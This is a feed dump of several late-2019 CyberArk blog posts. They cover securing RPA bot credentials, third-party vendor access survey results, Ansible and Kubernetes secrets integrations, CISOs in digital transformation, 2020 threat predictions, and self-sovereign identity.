Since robots can be generated automatically, the number deployed within an organization can grow rapidly – and that number may need to change frequently, compounding security risks. The privileged account credentials that robot scripts use can dramatically increase the threat surface if they are stored insecurely. The risks are even greater if organizations deploy Remote Desktop Applications (RDA) robots, commonly referred to as “unattended RPA,” using shared credentials.

As RPA deployments surge and the number of software robots continues to expand, organizations are searching for ways to marry automation with enforceable security practices that can help protect RPA investments while also recognizing faster time to value.

Five RPA Security Best Practices for Privileged Credentials and Access

Protecting software robot privileged credentials and access should follow the same security standards used for human users and applications, such as enforcing the principle of least privilege. However, there are a few implementation tweaks specific to RPA technology and the robot lifecycle that need to be implemented as well. For instance, removing hard-coded credentials from robot application scripts. Watch the whiteboard video below to learn five security best practices businesses should consider incorporating into their RPA workflows.

 

 

We’re only at the beginning of how RPA technology will transform businesses, but, as with most innovations, RPA can significantly expand the attack surface if not implemented properly. CyberArk can help you secure privileged account credentials used in RPA platforms and the expanding deployments of software robots.

CyberArk integrates seamlessly with more RPA solutions than any other privileged access management (PAM) vendor on the market. To see an integration in action, check out this recent webinar with BluePrism. And to dig deeper, visit our website or read this solution brief.

 

]]>
Third Party Access is a Top 10 Organizational Risk https://www.cyberark.com/blog/third-party-access-is-a-top-10-organizational-risk/ Thu, 05 Dec 2019 14:00:26 +0000 https://www.cyberark.com/?p=80553 Third Party Access

Nearly every organization today relies on a variety of remote third party vendors to access, maintain and support critical internal systems and resources. These vendors have come to play a critical role in maintaining modern organizations’ complex and distributed enterprise infrastructures.

Given that third party vendor access has been at the heart of recent breaches, CyberArk recently conducted a survey of IT and security decision makers to learn more about common approaches to managing and securing access to critical internal resources. Here are some of the most eye-opening findings:

Third Party Privileged Access is Everywhere.

It’s probably not a shock to most people that 90% of respondents said that they allow third party vendors to access critical internal resources. What was slightly shocking was that more than a quarter (26%) said that they use over 100 third party vendors! That’s a lot of accounts to account for, manage and secure.

For many organizations, securing third party vendor access is incredibly complex – often requiring a cobbled together solution of products like multi-factor authentication, VPN support, corporate shipped laptops, directory services, agents and more. This has not only led to confusion and overload for security practitioners, but also creates difficult and often insecure routes for third parties to access the systems they need to do their jobs.

Which leads to our next finding….

Third Party Access is a Top 10 Organizational Risk.

Nearly three-quarters (72%) of organizations view third party access as one of their top 10 organization-wide security risks, alongside others like cloud abuse, phishing and insider threats. Third party access is quickly rising in the ranks to become a top priority for organizations and for good reason. These attacks and resulting data breaches can be incredibly costly for organizations, both in terms of reputation and financial losses.

Despite this, the same organizations overwhelmingly aren’t satisfied with how they currently approach managing and securing access for these remote vendors. A whopping 89% of respondents felt that they could do better or were completely dissatisfied with their efforts to secure third party vendor access.

Provisioning and Acute Visibility is a Challenge.

So, if third party access is a top 10 risk, why are so many failing to secure it? We found that 50% of organizations state that provisioning and deprovisioning access was their biggest challenge, while 47% highlighted lack of visibility.

Provisioning and deprovisioning access can feel a lot like Goldilocks and the Three Bears. You can’t allow too much access (where vendors have access to things they don’t need or for longer than they’re needed) or too little (where vendors are forced to create unsafe backdoor routes to critical resources). It has to be just right.

However, currently, legacy solutions dominate. For instance, while 86% of organizations rely on VPNs to secure third party access, they were not designed to manage dynamic privileged access requirements like role-based access protection and session recording. On the visibility front, companies aren’t always aware of what third party vendors are doing once they authenticate – and that is a serious problem. A best practice – one often required for audit and compliance – is to record, log and monitor privileged activities.

As organizations depend more and more on third parties to get the work done, the difficulties they face when it comes to security is getting harder and harder to ignore.

Without a dedicated solution specifically for managing third party privileged access, organizations have been forced to use miscast solutions like VPNs . To remedy this problem, we introduced CyberArk Alero, a truly modern, innovative solution.

CyberArk Alero combines Zero Trust access, biometric multi-factor authentication and just-in-time provisioning into one Software-as-a-Service (SaaS)-based solution. Alero ensures that remote vendors only access what they need by integrating with CyberArk Core Privileged Access Security for full audit, recording and remediation capabilities.

Alero is designed to provide fast, easy and secure privileged access for remote vendors who need access to critical internal systems. By not requiring VPNs, agents or passwords Alero removes operational overhead for administrators and improves security.

To learn more about the challenges of securing third party access, read our eBook “Third Party Privileged Access to Critical Systems.” You can also request a demo to find out more about CyberArk Alero.

]]>
RPA: Citizen Developers – at the Corner of Speed and Value https://www.cyberark.com/blog/rpa-citizen-developers-at-the-corner-of-speed-and-value/ Tue, 03 Dec 2019 14:00:51 +0000 https://www.cyberark.com/?p=80254 Citizen Developer RPA Security

Gartner’s definition:  “A citizen developer is a user who creates new business applications for consumption by others using development and runtime environments sanctioned by corporate IT.”

The idea of a citizen developer is edging its way into reality across many Robotic Process Automation (RPA) platforms.  Through a simple graphical interface and smart building tools, non-tech users are empowered to automate processes via software bots into production environments.  The benefits provided by RPA technologies and solutions are significant. Giving standard users the ability to drag-and-drop future-proof apps without touching source code or having to know anything about programming languages creates a force multiplier for speed and value.

RPA can enable more rapid innovation and provide a leg up on competition.  It can also save time and money and enable the dev team to work on more impactful things.

The list goes on.

Domo Arigato, Mr. Citizen Developer

However, no technology is perfect – or perfectly safe – and RPA is no exception. In my previous blog, I touched on how RPA expands the organization’s overall attack surface and how rushing into this technology without examining security considerations introduces substantial risk.  The genesis of many RPA projects can be found within the organization’s Center of Excellence (COE).  At the COE-level, the first priority, before even beginning to consider the benefits of RPA, is securing and managing the access rights of this digital workforce.  It’s important to make the security team a part of the conversation on RPA implementation from the beginning. Including the security team means that security issues are addressed up front before they can cause delays in the final stages of deployment. Sustaining world-class performance and value cannot be achieved if security is an afterthought.

Gartner reinforces this point in its “Predicts 2019: RPA Evolution1 report:

“The rapid adoption of RPA software has created a lot of hype in the market, leading many organizations to jump into RPA initiatives without proper analysis, planning, defined strategies and COEs. All this elevates the risk of errors by failing to automate the right processes, identify the right guardrails, and focus on security issues and access rights for the new virtual users (RPA bots).”

What’s the Risk?

Security needs to be built in directly as part of the automation workflow.  As citizen developers become increasingly common, “security by design” becomes even more critical. Anyone can make mistakes, but citizen developers – who lack both technical and security knowhow – are more likely to make the kinds of mistakes that unknowingly expose access to sensitive corporate networks and systems.

Many of the current low-code platforms do not have built-in security, but IT can hook the platforms into best-in-class security solutions, taking security out of the hands of the less security conscious citizen developer.  If there aren’t enough developers to go around at the organization, before diving into low-/no-code environments or giving access citizen developers, credential management and security need to be top of mind.  Moreover, they need to be at the top of the list of strategic objectives for the COE to ensure that RPA is implemented securely and the desired outcome of the program is achieved successfully.

Gartner reaffirms the importance of credential security in its “Best Practices for Robotics Process Automation Success2 report:

“One of the most critical functions of the management platform is credential management. With robots actively accessing and manipulating data, thoughtful consideration and intentional implementation of credential management is a requirement of all RPA deployments. The management platform of an RPA system should allow for the creation, deletion and expiration of credentials for the RPA system, as well as the encryption of any locally stored credentials, if the use case requires them. “IGA, RPA, and Managing Software Robot Identities” is required reading for architects and technical professionals responsible for IAM.”

Why Security Matters

Developers often work fast and dirty.  They have aggressive deadlines.  They have internal and external pressures to get their code out the door at lightning speed.  Anything that has even a remote chance of slowing code production takes a back seat and security is no exception to this rule.  Now consider the citizen developer.  The majority of traditional developers at least have some knowledge of the importance of developing secure code – whether they choose to maintain technical ethics and write their code in a secure manner is another story.  However, the citizen developer doesn’t think like the traditional developer.  The citizen developer is often times a standard business user in some sort of managerial/supervisory capacity. They probably know very little about application and credential security, so they introduce risk to the app development pipeline.

Here are a few things to consider to help maintain the correct balance of security and usability:

  1. Be selective in who’s using these platforms.
  2. Establish guardrails and ensure users stay within the bounds of IT best practices.
  3. Automate any elements of security that can be automated (e.g. remove the application’s hard-coded credential and force the software bot to validate/authenticate prior to connecting to mission/business critical apps).
  4. Secure the RPA console and establish individual accountability for users with highly privileged access

Embrace Digital Transformation with Confidence.

Move fearlessly forward into the new digital landscape with CyberArk and take the first step by requesting a demo today. See how easy it is to start securing RPA workflows and processes with the #1 leader in privileged access security. To learn more about how to get started securely deploying RPA, read Gartner’s analyst report, “Predicts 2019: RPA Evolution.”1

 

1 – Gartner, “Predicts 2019: RPA Evolution,” 6 December 2018, Analyst(s): Stephanie Stoudt-Hansen, Frances Karamouzis, Arup Roy, Arthur Villa, Melanie Alexander

2 – Gartner, “Best Practices for Robotic Process Automation Success,” 18 June 2019, Analyst(s): Gregory Murray

]]>
Securing Ansible Automation Environments with CyberArk https://www.cyberark.com/blog/securing-ansible-automation-environments-with-cyberark/ Tue, 26 Nov 2019 14:00:36 +0000 https://www.cyberark.com/?p=80113 Ansible Automation

Automation Is Transforming IT Departments
Automated processes are transforming IT functions – even IT departments – by replacing manual tasks once handled by IT administrators with self-service tools and automated processes. For some organizations, automation tools are becoming the new system administrators, while, at the same time, helping IT professionals expand their reach across the organization.

What Is the Red Hat Ansible Automation Platform?

Red Hats Ansible Automation Platform incorporates Red Hat Ansible Engine, Red Hat Ansible Tower and SaaS-based capabilities for secure content management and analytics around automation deployments. The Platform is used by companies around the world including many CyberArk customers.

Red Hat Ansible Automation Platform provides enterprises with orchestration, configuration management and governance capabilities at scale, helping them to accelerate DevOps and digital transformation initiatives. For example, Red Hat Ansible Automation Platform enables organizations to rapidly provision cloud and on-premises infrastructure, deploy and update applications and meet other critical IT needs.

Automation Can Expand the Attack Surface
To perform and automate all of these functions, Red Hat Ansible Automation requires a high level of privileged access – in the form of powerful credentials or secrets – to access and manage IT resources and other services. As a typical Ansible Playbook can hold privileged credentials for many different IT resources, operating environments and tools, from a security perspective Ansible is often considered a Tier Zero (or mission-critical) asset.

Because of this, Ansible and other automation tools are attractive targets for cyber attacks. Threat actors can seek to compromise the credentials used by automation tools, just as they would for other Tier Zero assets such as Jenkins or root. If compromised, the attacker could gain access to many other IT resources and processes.

Frequently, human error or the absence of a robust security process results in inadvertent security vulnerabilities. And when poorly secured processes are automated, those vulnerabilities can scale exponentially and unnecessarily expose the enterprise to serious risk.

How Should Automation Environments Be Secured?

First, the secrets and privileged credentials used by automation solutions need to be secured. This starts by removing any hard-coded credentials from playbooks and any other places they’re located and rotating and managing credentials based on policy.  In some cases, monitoring activity to see how sensitive or powerful credentials are being used and applying just-in-time access and least privilege principles can help strengthen protections.

Second, the security footprint of the admin console – including human and programmatic access to the console – can be enhanced by taking a layered approach to access and credentialing. This involves rotating and managing credentials used by humans based on policy and roles, monitoring as needed and applying least privilege with just-in-time access as needed.

Securing development and automation environments can become increasingly difficult as organizations start to use a variety of platforms beyond Ansible (e.g., Jenkins, Red Hat OpenShift, Kubernetes, Puppet, AWS, Azure and others) with duplicate secrets management processes for each platform. This can create “security islands” that each require separate maintenance, management and auditing.

Ansible Automation leverages CyberArk to secure and manage the credentials that automation environments use to actually automate IT deployments.

 Enhancing Ansible Security with CyberArk Integrations

CyberArk offers several integrations with Red Hat Ansible Automation to provide organizations with simplified, automated secrets management, including integrations with both The CyberArk Application Access Manage Central Credential Provider and Dynamic Access Provider, as well as CyberArk Conjur Open Source.  Very briefly these integrations include:

  • Red Hat Ansible Tower Secrets Management System. This integration provides Ansible Tower users with an easy-to-use menu option to select CyberArk to centrally secure, manage, audit and rotate the secrets used by Ansible Tower (v3.5.1 and higher) to access IT and other resources —while enabling just-in-time secrets retrieval. See documentation here.
  • Onboarding Secrets Created in Play. This integration leverages the CyberArk Privileged Access Security Solution to randomize secrets created mid-play and onboard secrets into the Vault before the end of play.
  • Built-In Lookup Plugins for Ansible Engine (AAM Lookup and DAP/Conjur Lookup). Available in Ansible Engine v2.5 and above, the plug-ins retrieve secrets “just-in-time” from Dynamic Access Provider or Conjur Open Source.
  • Protecting the Ansible Console. This integration uses the Secure Web Application Connectors Framework to enable CyberArk to provide enhanced protection for the Red Hat Ansible Tower Website account.

There is also an integration that enables CyberArk DNA to detect unprotected credentials in Ansible Playbooks. CyberArk also has an integration with the Ansible security automation that enables Ansible Automation to automate CyberArk and other security functions. Learn more about these and other Ansible integrations on the CyberArk Marketplace or by joining the CyberArk open source community, CyberArk Commons. And, for a deep dive on Ansible Automation secrets management with Conjur Open Source, read “Managing Secrets in Red Hat Automation Playbooks.”

Learn More: Dec. 11 Webinar and Dec. 4 Workshop

Additionally, we have two live events scheduled in December. Both events are ideal for:

  • Ansible Automation developers who want to find ways to better secure their Ansible Playbooks by utilizing their organization’s existing CyberArk infrastructure.
  • Cybersecurity professionals who want to better secure their organization’s Ansible environment by giving automation developers more secure access to privileged credentials managed by CyberArk.

Don’t miss our December 11 webinar, “Securing Ansible Automation Environments with CyberArk.”  This webinar explores common use cases and best practices for securing Ansible Automation environments and includes practical tips for getting started and improving security by enhancing Ansible’s native capabilities without slowing down automated processes. Register Here.

We’ve teamed up with Red Hat for a hands-on Ansible Workshop, “Securing Ansible Automation Environments.” This workshop highlights practical guidance for using CyberArk to help secure Ansible Playbooks and environments. The December 4 half-day workshop will be held in Chicago.

Attendees will participate in hands-on exercises and interact with security and automation peers to share challenges and successes. Request registration for the workshop or learn more by contacting sales@cyberark.com. Space is limited, so get in touch today!

 

]]>
How CISOs Can Be Accelerators for Digital Transformation https://www.cyberark.com/blog/how-cisos-can-be-accelerators-for-digital-transformation/ Thu, 21 Nov 2019 14:00:42 +0000 https://www.cyberark.com/?p=79674 Digital Transformation for CISOs

It’s safe to say digital transformation has reached a tipping point. No longer just a buzzword or aspiration, it’s happening en masse. Companies are rapidly modernizing their infrastructure and processes to improve customer service, application development, supply chain collaboration and much more.

According to a new CyberArk study,  the vast majority of businesses (74%) are engaging in some level of digital transformation today with most deploying digital transformation projects at enterprise scale.  Whether it’s foundational technologies like cloud or emerging initiatives like DevOps and robotic process automation, companies are employing them to boost productivity, increase revenue opportunities and reduce costs. However, new technologies and processes also create new risks and operational challenges.

Successful Digital Transformation Demands Security: Priority or Just Lip Service?

One of the most interesting things we found in the study was how important cybersecurity and the role of the Chief Information Security Officer (CISO) was to the success of digital transformation initiatives. Almost everyone agreed that security should be embedded from the start of all digital transformation projects. Nearly half (44%) of respondents said digital business projects would move faster with security leaders involved from the onset – leading to faster time to value.

Yet, despite this, most companies aren’t making security a strategic focus as they embrace transformative technologies. Just one-third reported having dedicated security team responsible for digital transformation and only 38% reported that CISOs are brought in at the beginning of a digital transformation initiative.

That could be because many (60%) view CISOs as functional managers rather than strategic advisors who can help guide digital business strategies. In fact, 40% reported that they would either find workarounds or move forward without security’s approval if security professionals deemed the digital transformation initiative presented too much risk.

If security is widely considered to be a crucial component of digital transformation initiative success, why is there such a disconnect? Is it a culture issue within organizations? Is the need for speed trumping strategic CISO counsel? Is the CISO failing to lean in? Is the CISO unsupported by other business leaders? Or, perhaps, it’s a dangerous mix of all of these scenarios.

Creating A Security-First Mindset

While digital transformation programs offer a significant opportunity for CISOs to demonstrate their strategic acumen, a security-first culture starts at the top. It’s not just up to the CISO to “lean in” more. Driving meaningful change within an organization must be championed by the rest of the top line business leaders and cascaded throughout the organization. However, there are some things CISOs can do to help drive this change forward.

Check out the video below for the top 3 CISO digital transformation strategies:

 

 Transformational initiatives deserve heightened security consid­eration and CISOs deserve a seat at the table from the get-go. Business leaders must acknowledge security’s ability to shape and accelerate digital transformation initiatives – and elevate and empower CISOs to drive these changes. Organizations that get this right will be best equipped to move fearlessly forward in the new digital landscape.

To learn more about strategies CISOs can take to drive successful digital transformation initiatives download the full report “Three CISO Strategies for Digital Transformation Success.”

]]>
The Top Cybersecurity Trends That Will Shape 2020 https://www.cyberark.com/blog/the-top-cybersecurity-trends-that-will-shape-2020/ Tue, 19 Nov 2019 14:00:29 +0000 https://www.cyberark.com/?p=79161 Cybersecurity

As we embark on a new year, it’s normal to think about what the future will have in store for us. From a cybersecurity perspective, there are a lot of questions about what’s coming. What are the big technology trends and what risks will they pose?

Will attackers be interested in new technologies like AI and biometrics or will they focus on infiltrating conventional systems in new and innovative ways? What will the attack vectors be? Will traditional attack methods continue to reign supreme or will new approaches emerge?

As we head into a new decade, there’s no doubt that attackers will try to use innovation against us, but determining where they will focus is always a challenge. Here are the top security trends we believe will impact both businesses and consumers in 2020:

1. Drones Open up New Pathway for Intelligence Gathering

To date, the security concern around drones has mostly been focused on the physical damage nefarious actors, including nation states, could perpetrate. In 2020, we could start seeing attackers focus more on what drones know and how that information can be exploited for intelligence gathering, corporate espionage and more.

While it’s true that drones have the potential to do physical damage, the longer-term opportunity for attackers is to use drones as another pathway to steal – and manipulate – sensitive information.
Goldman Sachs recently predicted that businesses will spend more than $17B in the next five years on drone functionality. With an emphasis on innovation and development, these devices need to be treated the same as any other IoT device with software that gathers and stores sensitive information that needs to be protected.

Organizations need to consider who has the ability to control the drone’s activities, what information the drone is storing, how access to that information is being managed and monitored and, ultimately who owns responsibility for securing it. The creation of a security framework that mitigates emerging security risks and potential regulatory and compliance challenges can help address these questions.

2. The Butterfly Effect of Ransomware

In the first nine months of 2019, reports indicate there were between 600-700 ransomware attacks on government agencies, healthcare providers and schools in the U.S. alone. Cities and public sector organizations around the world have faced a steady barrage of ransomware attacks with momentum continuing to build heading into 2020. With these attacks aimed at disruption and destabilizing systems, cities and towns, in particular, will need to elevate their approach to cyber resiliency.

The constant bombardment will have a butterfly effect that’s impact will reach far beyond what we’ve seen to date. These effects will include:

  • Attacker Innovation Shifts to the Cloud: The absence of spectacular ransomware attacks like Petya doesn’t mean attackers have stopped investing in malware. They’re just shifting their focus. In many ways attackers subscribe to the “if it ain’t broke don’t fix it” philosophy. The malware families that have been around for years still work and are effective for many reasons – mostly because many organizations still neglect to adhere to basic patching practices.

That said, attackers keep looking for new ways to monetize their assaults. If they’ve got malware that is steadily performing in Windows environments, what’s the next target? Attackers want access to a greater diversity of systems, including cloud environments and containers. Coming up, we’ll begin to see innovation in ransomware that focuses more on Linux to take broader advantage of digital transformation trends.

  • Cyber Insurance Gold Rush Fuels Ransomware Attacks: Despite government warnings not to pay the ransom in ransomware attacks, more organizations are turning to cyber insurance to protect their assets and uptime. We expect to see a significant increase in the number of entities buying cyber insurance, making it one of the fastest growing markets related to cyber security. In fact, cyber insurance is projected to be a $7 billion market in the U.S. alone. However, this investment in “protection” is having a contrary effect – and will drive even greater waves of attacks.

Attackers will target organizations with cyber insurance because those organizations are more likely to pay. Insurance companies weighing the cost benefits of a payout will often choose to pay if the cost of the ransom is less than the cost of the downtime needed to rebuild a network. Ultimately, this gold rush will benefit attackers – tilting the power in their direction, fueling resources and spurring the need for policy changes and disruption across the insurance industry.

3. Election Security: Cyber Attacks as a Disenfranchisement Mechanism

Election security is a hot topic for democracies everywhere. While much of the discussion tends to focus on disinformation campaigns, including the use of deepfake technology to influence opinion, attacks will evolve to disrupt more than just the media.

It’s important to consider the broader effect of disruption and disenfranchisement beyond ballot box tampering. Attackers have repeatedly demonstrated their ability to cause disruption. Their impact on democracies could come in many – even seemingly disconnected – forms.

Stalling major transportation systems – like buses and trains – in major metropolitan areas could keep citizens from safely getting to the polls. A sequence of such attacks targeting core infrastructure – halting transportation, shutting down the electrical grid or launching an attack on voter registration databases – could have a domino effect that negatively impacts the voting system’s ability to operate consistently with trust and reliability.

4. Biometrics Create a False Sense of Security in the Enterprise

With biometric authentication becoming increasingly popular, we’ll begin to see a level of unfounded complacency when it comes to security. While it’s true that biometric authentication is more secure than traditional, key-based authentication methods, attackers typically aren’t after fingerprints, facial data or retinal scans. Today, they want the access that lies behind secure authentication methods.

So, while biometric authentication is a very good way to authenticate a user to a device, organizations must be aware that every time that happens, that biometric data must be encrypted and the assets behind the authentication are kept secure.

Even more importantly, the network authentication token that’s generated must be protected. That token, if compromised by attackers, can allow them to blaze a trail across the network, potentially gaining administrative access and privileged credentials to accomplish their goals – all while masquerading as a legitimate, authenticated employee.

 

]]>
Self-Sovereign Identity: A Distant Dream or an Immediate Possibility? https://www.cyberark.com/blog/self-sovereign-identity-a-distant-dream-or-an-immediate-possibility/ Thu, 14 Nov 2019 16:36:08 +0000 https://www.cyberark.com/?p=99162

To help solve the identity problem, enter Self-Sovereign Identity (SSID), which enables users to own, control, and present their identity data as needed all the while enabling service providers to securely validate and trust the identity claim.

In today’s digital world, our identities are scattered everywhere, across every app and service we interact with either at home or at work. Most of us have lost track of the countless set of registration forms we have filled and provided our personal identity information with a faint assumption that the provider can be trusted and will secure our data. But this uncontrolled data proliferation and the service provider’s inability to properly secure critical elements of identity have time and again proven to be the root cause of frequent identity breaches. Social Identity providers such as Facebook, Twitter, LinkedIn rushed in to address this issue by centralizing the identity and presenting it to the requesting service upon user consent. Some of these centralized identity providers have become regular and easy targets for hackers to obtain users information from one source rather than scour through multiple providers.

These breaches not only effected our social, professional, and financial lives but also led us to slowly accept the alternative reality that privacy is no longer a social norm or a personal choice. Providers also are subject to liability provisions storing users’ data across geographical jurisdictions and are required to comply with various privacy compliance requirements such as HIPAA, GDPR, CCPA etc. and any breach into their systems could result in significant fines and reputation loss. This makes the identity problem a double-edged sword for the user and the provider and a difficult one to solve.

Enter the world of Self-Sovereign Identity

Now imagine a concept where the digital world no longer requires a user’s personal data but can validate the identity by just accepting a “verifiable credential” issued to the user by competent and trusted identity authorities. A non-digital equivalent of this would be our paper-based passports, driver’s license or birth certificates that are issued by the relevant government authorities that we store in a secure place and present as a proof to services that require them. For instance, each time we (the holder) board an airplane or rent a car we prove our claims by opening our wallet and presenting a trusted authority (the issuer) issued identity card to a person or company who needs to trust the claim (the verifier).

In the digital world, this would be achieved using mathematically derived unique and random identifiers, known as the Decentralized Identity (DID). The user uses a secure wallet app on their trusted device to generate a public/private key pair, store the private key in the device and publish the public key to a SSID powered decentralized ledger (like Sovrin) that would then generate and store the User DID for the public key in its data store. The user then requests a trusted authority (such as Department of Motor Vehicles for Driver’s License, Department of State for Passport etc.) for validated digital identity claims. The trusted authorities issue verified credentials, containing verified personal information/attributes about the user (claims), after signing it with its own DID (known as Issuer DID). The verified credential is then counter-signed by the User DID and stored in a secure wallet app on a device, encrypted and fully in the user’s control. When service providers require user information, users can present the whole claim or only a subset of the claim of the verified credential from their secure wallet (and hence self-sovereign). The claim can also be modified by the user to ensure minimal disclosure of private data (for instance, present Age>18 without revealing the user’s date of birth) without compromising the signature of the original claim. The service provider can validate the authenticity of the identity by verifying the public key signatures of the User DID and Issuer DID on the decentralized ledger and provide the requested service based on the presented claim. Users can also use their wallet to view and track which service providers they granted claims to and revoke them at any time as needed.

This concept is what is referred to as the Self-Sovereign Identity (SSID) which enables users to own, control, and present their identity data as needed all the while enabling service providers to securely validate and trust the identity claim. SSID can also be viewed as a “decentralized, claims based authentication and authorization” of user by the service provider (Claims Verifier) with the public decentralized ledger acting as a smart verifiable contract between the Issuer, Holder and Verifier entities. Blockchain technologies such as Sovrin, Bitcoin and Ethereum are built on decentralized ledger technology (DLT), are immutable by design and qualify as the ideal candidate for solving the concept of SSID.  It’s important to note that users personally identifiable data are only stored on the end user’s device and never on the blockchain ledger. Claims Issuers are also not required to be online during claims verification as verification is performed against the highly available decentralized ledger.

Self Sovereign Identity image1

Let’s see how this works with a use case. John Smith needs to rent a car for his personal travel. Typically, he would need to individually sign up with all his personal details at car rental websites to prove his age (provide his date of birth) and provide proof of a valid driver’s license (upload a copy of his Driver’s License) before he can complete the booking. The below diagram represents how he will present his present his SSID to complete this transaction.

Self Sovereign Identity Image2

In the above use case, John (the holder of the verifiable credential aka Digital Identity) is only required to provide his personal information to prove his identity with the trusted identity provider, Department of Motor Vehicles, obtain a validated, verifiable credential that is signed by the Issuer DID that is previously registered in an de-centralized data store (Verifiable Data Registry). This signed credential/claim can be securely stored in his trusted mobile device and be associated with a unique digital identity (User DID) that is also registered in the de-centralized data store. Once this is established, he can choose to present only a subset of the digital identity attributes that is required by the car rental company without invalidating the signature of Department of Motor Vehicles. The car rental company can then verify the authenticity of the identity and claim by verifying the User and Issuer DID signatures (contained in the claim) against the verifiable data registry, validate that John meets the legal age requirement to drive and has a valid driver license before completing the booking. The transaction would not have gone through if his driver’s license has expired as per the rules (Expiry date) defined against the verifiable credential schema setup by the Department of Motor Vehicles. If he must make a reservation at a hotel or book his airline tickets, all that is required by John is to share this verified digital identity without needing to register with his personal information in each of these service provider websites.

Challenges to Self-Sovereign Identity

There are a few real-world use cases that indicate the rapid advancement and usage of blockchain for digital identity. However, industry standards for digital identity definitions and its interoperability mechanisms are just evolving, primarily driven by World Wide Web Consortium (W3C), and would need to be finalized to enable holders, issuers, and verifiers to securely transact using digital verifiable credentials.

Self-sovereign also does not mean you have full rights to verify your own identity. There is still reliance on trusted authorities to validate and issue verified credentials. Users are still required to obtain such verified credentials from multiple trusted authorities and store it in a secure wallet on their device before they can transact with today’s digital world. The scenario of how users can move their verified credentials from one device wallet to the other or when they lose their trusted device is another challenge worth noting.

Then comes the important challenge of the right to be forgotten. Though the presented claims are not expected to be persisted by the service provider, there can be several instances where they would want to store user attributes in their own data store for seamless and continued service. For instance, an on-line shopping retailer will require name, address, phone number to deliver an item ordered by the user. Even though they may have obtained this data upon express consent of the user, they may decide to store it in their own datastore for continued service or marketing needs. The data then is outside the self-sovereign identity realm which then breaks the very fundamentals of de-centralized identity and the concept of owning and controlling your own data. When the user decides to revoke the previously granted claim, all that he has to do is request the claim be removed and forgotten by the service provider. There are no automated processes or standards in place to fulfill this right to be forgotten scenario, which could then lead to data breaches that self-sovereign identity was conceived to address.

Closing thoughts

As governments and compliance agencies tighten the user privacy requirements, there is no doubt that the self-sovereign identity has great potential to change the way our digital data is verified, stored and shared. Though there is a great deal of enthusiasm around SSID with ecosystem and standards rapidly evolving, we are still very far away from an ideal world where we can truly own, control and transact with our self-sovereign identity.

]]>
Three Cybersecurity Lessons Learned in the 2010s https://www.cyberark.com/blog/three-cybersecurity-lessons-learned-in-the-2010s/ Thu, 14 Nov 2019 14:00:21 +0000 https://www.cyberark.com/?p=79205 Privilege Access Management PAM

As we face the close of the decade in a couple of short months, it seems like a good time to take stock of the progress cybersecurity technology has made in the 2010s before we start looking ahead to what’s next in the ‘20s. A few weeks ago, I had the opportunity to attend KuppingerCole’s CyberNext Summit 2019 and Borderless Cyber 2019 conference in Washington DC.

The conference centered on some of the latest developments in the field of cybersecurity and left me thinking about some of the lessons learned over the past decade. Here are three trends and technologies that took off in the past decade and what we can learn from them.

  1. Eliminating Security Siloes

One of the major business challenges of the past decade is associated with siloed and often disconnected data and tools – slowing operational effectiveness and the ability to deliver innovative products and services. Never mind the introduction of massive security risk. An industry-led solution to this challenge was a major announcement from the conference – the introduction of a global, multi-vendor cybersecurity ecosystem, the Open Cybersecurity Alliance (OCA) through the OASIS international consortium.

OCA gets its legs from the fact that, on average, organizations use between 25 and 49 different security tools from up to 10 different vendors. This is both time consuming and expensive as well as making it difficult to integrate security tools into established operational environments.

The OCA provides out-of-the-box integrations between these tools to foster an open cybersecurity ecosystem, enable the free exchange of information and orchestrate responses via commonly developed code and tools, using agreed upon tech, standards and procedures. The OCA already has two main projects underway. The first is IBM Security’s STIX-Shifter, which is dedicated to the development of a search function for cybersecurity products. The second is McAfee’s OpenDXL, an interoperable messaging format that helps organizations share information.

CyberArk is proud to be a founding member, and the only Privileged Access Management (PAM) vendor in the Alliance. We view eliminating silos as a way of not only increasing the usability of each respective security solution in an organization’s stack, but also helping organizations to share information with each other about best practices. We’d like to see this trend continue into the ‘20s.

  1. Using AI More Effectively

Over the course of the past decade, Artificial Intelligence (AI)  has evolved from being relied upon for decision support (forensic analysis, malware analysis, security team productivity) and intelligent automation (faster threat mitigation, orchestration, RPA, incident response) to cognitive processes (threat intelligence, attack pattern analysis, security policy optimization).

However, as I heard a MasterCard security practitioner neatly summarize during a session about AI, “If you automate a broken process, you’re just doing dumb stuff faster.” This highlighted, for me, a key feature of AI systems. AI can provide insights and increase efficiency, but it can’t fix the underlying problems in your system.

AI is only as good as the processes they automate and the people who manage them. What we’ve learned from this past decade is that AI must be paired with smart policies, human engagement and other tools, like Robotic Process Automation (RPA), to reach its potential.

  1. Threat Intelligence and Response

The importance of being able to identify and respond quickly to threats is a lesson we’ve learned the hard way over the past decade. We’ve faced new and increasingly targeted threats – from a ransomware infection that can bring a whole city to a halt to nation state attacks taking over telecommunications. That, coupled with the fact that environments are increasingly ephemeral and dynamic inherently makes life harder than ever on the Security Operations Center (SOC).

Fortunately, advances in security analytics have been able to dramatically operationalize and improve threat intelligence and response, key components of the SOC. Additionally, by having various data shared from tools, people and processes across the network, intelligently identifying threats is more possible now than ever before. Consequently, the SOC has gotten smarter and smarter about detecting and mitigating threats and likely will continue to be able to better automate intelligence and respond to threats to minimize damage.

For more information about CyberArk and to learn what you can do to secure your organization’s most critical systems, please check out the ways in which we help organizations secure privileged access.

 

]]>
New Open Source Offerings Simplify Securing Kubernetes https://www.cyberark.com/blog/new-open-source-offerings-simplify-securing-kubernetes/ Tue, 12 Nov 2019 21:21:23 +0000 https://www.cyberark.com/?p=79128 Kubernetes Open Source

In advance of the upcoming KubeCon 2019 (CyberArk booth S55), the flagship event for all things Kubernetes and Cloud Native Computing Foundation, CyberArk is adding several new Kubernetes offerings to its open source portfolio to improve the security of application containers within Kubernetes clusters running enterprise workloads.

Secrets Can Be Pushed to Native Kubernetes Secrets Store

CyberArk’s out-of-the-box integration with Kubernetes Secrets strengthens the security of the native Kubernetes secrets mechanism by enabling CyberArk to centrally manage secrets without requiring any changes to code or further involvement of developers. The integration is available for Conjur Open Source and CyberArk Application Access Manager.

A challenge with the native secret stores of  various tools and platforms used in development and production environments is that not only are credential management, rotation, audit and other similar processes limited and inconsistent, the ability to securely share secrets across tools is also limited.

Too often this results in islands of security with poorly and inconsistently secured secrets, sometimes with the same secret stored in multiple tools. The CyberArk integration with Kubernetes enables organizations to use CyberArk to centrally manage Kubernetes secrets alongside secrets used by other leading tools and platforms, including Jenkins, Ansible, OpenShift and more.

For organizations using Conjur Open Source to manage application secrets and other credentials, secrets are pushed to the native Kubernetes secrets store based on Conjur policies. Conjur’s management of Kubernetes is completely transparent to developers since no changes are required. The application code simply accesses the secrets in the Kubernetes secrets store exactly as it did before.

